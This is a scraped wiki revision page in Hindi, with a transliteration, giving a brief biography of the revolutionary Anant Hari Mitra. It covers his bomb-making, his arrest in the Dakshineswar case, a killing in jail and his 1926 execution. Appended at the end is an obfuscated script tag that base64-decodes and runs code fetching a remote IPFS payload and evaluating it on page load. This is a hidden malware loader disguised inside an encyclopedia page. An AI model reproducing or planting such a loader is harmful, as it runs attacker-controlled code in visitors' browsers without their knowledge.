Difference between revisions of "अनन्त हरि मित्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*'''अनन्त हरि मित्र''' भारत के अमर क्रांतिकारियों में ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "कदम" to "क़दम")
 
Line 5: Line 5:
 
*इन्होंने दक्षिणेश्वर में रहते हुए बमों का निर्माण किया।
 
*इन्होंने दक्षिणेश्वर में रहते हुए बमों का निर्माण किया।
 
*[[10 नवम्बर]], [[1925]] ई. को उन्हें दक्षिणेश्वर बम काण्ड के प्रमुख अभियुक्त के रूप में गिरफ्तार किया गया।
 
*[[10 नवम्बर]], [[1925]] ई. को उन्हें दक्षिणेश्वर बम काण्ड के प्रमुख अभियुक्त के रूप में गिरफ्तार किया गया।
*जेल में उन्होंने पुलिस उप-अधीक्षक की हत्या कर दी तथा उन पर मुकदमा चलाया गया।
+
*जेल में उन्होंने पुलिस उप-अधीक्षक की हत्या कर दी तथा उन पर मुक़दमा चलाया गया।
 
*उन्हें फाँसी की सज़ा सुनाई गई तथा [[28 सितम्बर]], [[1926]] को अलीपुर जेल में 'अनन्त हरि मित्र' देश के लिए शहीद हो गए।
 
*उन्हें फाँसी की सज़ा सुनाई गई तथा [[28 सितम्बर]], [[1926]] को अलीपुर जेल में 'अनन्त हरि मित्र' देश के लिए शहीद हो गए।
  

Latest revision as of 08:24, 8 July 2011

  • anant hari mitr bharat ke amar kraantikariyoan mean se ek the.
  • inaka janm 1906 ee. mean hua tha.
  • inhoanne sarvapratham asahayog andolan mean sakriy roop se bhag liya tha.
  • isake bad ve poorn roop se kraantikari gatividhiyoan mean sanlagn ho ge.
  • inhoanne dakshineshvar mean rahate hue bamoan ka nirman kiya.
  • 10 navambar, 1925 ee. ko unhean dakshineshvar bam kand ke pramukh abhiyukt ke roop mean giraphtar kiya gaya.
  • jel mean unhoanne pulis up-adhikshak ki hatya kar di tatha un par muqadama chalaya gaya.
  • unhean phaansi ki saza sunaee gee tatha 28 sitambar, 1926 ko alipur jel mean 'anant hari mitr' desh ke lie shahid ho ge.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

nagori, d aau. es.el. “khand 3”, svatantrata senani kosh (gaandhiyugin), 2011 (hindi), bharatadiskavari pustakalay: gitaanjali prakashan, jayapur, prishth san 2.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>